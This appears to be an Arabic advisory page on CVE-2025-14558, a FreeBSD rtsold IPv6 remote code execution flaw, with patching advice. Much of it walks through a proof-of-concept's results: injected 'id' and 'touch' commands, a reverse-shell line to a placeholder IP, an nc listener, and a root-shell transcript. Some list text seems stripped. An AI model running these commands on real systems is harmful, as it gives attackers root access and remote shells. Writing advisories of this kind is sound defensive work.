
CVE-2025-14558
CVE-2025-14558 هي ثغرة تنفيذ برمجي عن بُعد (RCE) حرجة تؤثر على أنظمة FreeBSD التي تستخدم خدمات طلب الموجّه عبر IPv6. تسمح ثغرة في كيفية معالجة مدخلات الشبكة غير الموثوقة للمهاجمين بتنفيذ أوامر شل عشوائية.
rtsol(8)rtsold(8)resolvconf(8)إذا تم استغلالها بنجاح، يمكن للمهاجم:
إجراءات موصى بها بشدة:
rtsol / rtsold إذا لم تكن إعلانات IPv6 RA مطلوبةأي نظام FreeBSD يستمع إلى إعلانات التوجيه IPv6 على شبكة غير موثوقة يكون في خطر كبير. طبّق التصحيح فورًا أو عطّل الخدمات المتأثرة.
إذا كان نص إثبات المفهوم (PoC) لـ CVE-2025-14558 يعمل بنجاح على نظام FreeBSD ضعيف (غير مُصحح، مع تشغيل rtsold ومعالجة رسائل IPv6 RA):
rtsold يعمل بصلاحيات الجذر ويستدعي /sbin/resolvconf مع النطاق الخبيث).لاختبار بسيط مثل --command "id > /tmp/pwned":
يتم إنشاء ملف /tmp/pwned يحتوي على إخراج مثل:
uid=0(root) gid=0(wheel) groups=0(wheel)
بالنسبة لـ --command "touch /tmp/exploit_success":
/tmp/exploit_success.لصدفة عكسية مثل --command "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1":
تحقق على الهدف باستخدام أوامر مثل:
ls -l /tmp/pwned
cat /tmp/pwned
يخرج السكريبت:
[+] Sending malicious RA on eth0
[+] Injected command: id > /tmp/pwned
[+] Target must run vulnerable rtsold and process the RA
[+] Done. Check target for execution (e.g. /tmp/pwned)
بالنسبة للصدفة العكسية: في حالة النجاح، سيتلقى nc -lvnp 4444 اتصالًا وصدفة بصلاحيات الجذر:
listening on [any] 4444 ...
connect to [YOUR_IP] from (UNKNOWN) [target_ip] XXXXX
bash: cannot set terminal process groups: No job control in this shell
bash: no job control in this shell
root@vulnerable-host:~ #
(لديك الآن صدفة بصلاحيات الجذر – اكتب أوامر مثل id, whoami, إلخ.)
rtsold غير قيد التشغيل، لست على نفس شبكة L2، جدار الحماية يحظر RA، أو IPv6 معطل.هذا ملاحظ فقط في مختبر مُتحكم به على نظام FreeBSD ضعيف (قبل تصحيح 16 ديسمبر 2025). لا توجد تقارير استغلال عامة في العالم الحقيقي حتى 23 ديسمبر 2025. طبّق التصحيح فورًا في بيئة الإنتاج.